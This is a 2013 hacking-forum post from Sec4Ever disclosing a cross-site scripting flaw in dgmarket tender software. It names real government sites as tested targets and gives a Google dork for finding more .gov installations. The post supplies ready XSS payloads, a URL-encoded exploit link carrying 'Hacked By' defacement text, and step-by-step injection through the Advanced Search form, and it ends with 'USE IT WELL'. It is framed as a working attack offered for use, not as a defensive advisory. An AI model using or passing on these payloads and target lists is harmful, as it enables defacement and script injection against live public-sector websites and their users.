الحماية للأبد -Security 4 Ever

الحماية للأبد -Security 4 Ever (https://www.sec4ever.com/home/index.php)
-   قسم جديد ثغرات الأعضاء (https://www.sec4ever.com/home/forumdisplay.php?f=60)
-   -   dgmarket XSS Vulnerability (https://www.sec4ever.com/home/showthread.php?t=12878)

1001 14-07-2013 06:59 PM

dgmarket XSS Vulnerability
 
1 مرفق
كود PHP:


 ___________       _______  ____ 
/_   \   _  \   /\ \   _  \/_   |
 |   /  /
_\  \  \/ /  /_\  \|   |
 |   \  \
_/   \ /\ \  \_/   \   |
 |
___|\_____  / \/  \_____  /___|
            \/            \/     

  
_____________________________________________________________________________________________
|/
||
Tested in Mozilla/5.0 (Windows NT 6.2WOW64rv:20.0Gecko/20100101 Firefox/20.0
||Tested on Target : ( marche.gov.rw  market.gov.rw dgm.export.gov.il dgmarket.com )
|| 
Gr33t'z = b0x , 1010 , sultan , x1x , ( Black widow spider TEAM ) , Sec4Ever 
|+----------------------------------------------------------------------------------------------
|   [+] dgmarket XSS Vulnerability |
+----------------------------------+

You Can use any ( HTML + JAVASCRIPT + CSS ) and make it run in the target ,,
just with this XSS Vulnerability .. 
There Are alot of target'
z  at ( .gov.* )  Domian  :$ :P
google Dork )  : inurl:"/tenders/list.do"

=====================
||  USE 
This Way   ||
=====================



1): the Xss exploit like Http://www.TARGET.LTD//tenders/tenders/list.do?referenceNo=[XSS]
2): but Your Xss to work must be like That 


" #\"^\"5''6'/>/>?>?>?>?>?6'6'6'%---%55050<h1>1001</h1>";*%$^&%^</script><script language="javascript" type="text/javascript">
alert('YOUR XSS CODE HERE ');
</script>

3): So to exploit  it will be 

Http://www.TARGET.LTD//tenders/list.do?referenceNo=%22+%23\%22^\%225%27%276%27%2F%3E%2F%3E%3F%3E%3F%3E%3F%3E%3F%3E%3F6%276%276%27%25---%2555050%3Ch1%3E1001%3C%2Fh1%3E%22%3B*%25%24^%26%25^%3C%2Fscript%3E%3Cscript+language%3D%22javascript%22+type%3D%22text%2Fjavascript%22%3E+alert%28%27My+Stored+Xss+Code+!!+Hacked+By+!00!%27%29%3B+%3C%2Fscript%3E%3Ch1%3E+HACked+!00!+%3C%2Fh1%3E
=====================
|| OR USE This Way ||
=====================


1): Go to your target Http://www.TARGET.LTD//tenders/tenders/list.do
2): Press ( Advanced Search ) .
3): At box .. (Reference Number) Enter This Code --> 

" #\"^\"5''6'/>/>?>?>?>?>?6'6'6'%---%55050<h1>1001</h1>";*%$^&%^</script><script language="javascript" type="text/javascript">
alert('YOUR XSS CODE HERE ');
</script>

or 

" #\"^\"5''6'/>/>?>?>?>?>?6'6'6'%---%55050<h1>1001</h1>";*%$^&%^</script> [ XSS_CODE_HERE ] 

[ XSS_CODE_HERE ] = edit it with Your Xss Code .

|+---------------------------------+
|[+] USE IT WELL < Thank'z For All |
+----------------------------------+ 



الساعة الآن 11:47 PM

Powered by vBulletin® Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.